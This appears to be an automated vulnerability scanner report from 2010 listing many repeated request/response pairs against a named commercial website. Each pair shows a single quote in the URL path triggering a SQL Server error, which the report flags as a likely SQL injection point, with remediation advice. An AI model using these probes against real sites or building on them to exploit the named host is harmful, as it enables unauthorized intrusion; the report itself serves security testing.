<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FFLKIDJBCMHDONGCPGCBJPDH; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FGLKIDJBDHIJAKFCEAJAPHNH; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GGLKIDJBFFGLGEIDHAGGJNLE; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EPKKIDJBLIDPJEBNNIBLDPMC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GPKKIDJBGKOPFDLFDFDJDOEK; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NBLKIDJBNHGBOBFNGGJMBDFB; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ACLKIDJBELIPBAFOLDDBDKOM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JCLKIDJBFFCGCCJPDPBNEOCP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MCLKIDJBLMAIJFLLPOIEFFHL; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDLKIDJBJKJDFEMJMDIPNNBJ; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EDLKIDJBFDJKFCPNANPKCMHE; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DELKIDJBIHGFDACPGCMJLBKE; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EELKIDJBMNKKLNNNJJOGMJCP; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CFLKIDJBICMJLIHJHKEIKGPP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EFLKIDJBCBILODGLKBMCGBGF; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=BJMKIDJBGCKOKCIKMODHDMKD; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DJMKIDJBKJEEDCLDEJDBONIA; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GILKIDJBCCNINELBFIFKENLC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JILKIDJBJCCBEGJIFPFOOBCD; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=APLKIDJBHGKMFLDAGFOPBCIL; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CPLKIDJBEGOOBELBNNJFJEDN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IFMKIDJBOBBACJOLFGMCLHOO; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LFMKIDJBGFJMICBFCJEGCDNK; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FEMKIDJBEKNKELOCOLCEFOML; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MEMKIDJBAHHNMMNFPJGBJHBA; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MHLKIDJBNLNHJOBFJIIHKKON; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NHLKIDJBHDNFFOJEBABLBNBE; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JGLKIDJBCIEIJIJKMAAHNJAH; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KGLKIDJBKGBDJGEFJNGGOGDG; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HELKIDJBCEPCMGLFIBJIODNP; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KELKIDJBOFNGFIAAAPJLNGJJ; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PIKKIDJBMHKCHJPNDILBHLKB; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AJKKIDJBDEKNOGBMMJNLCENO; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
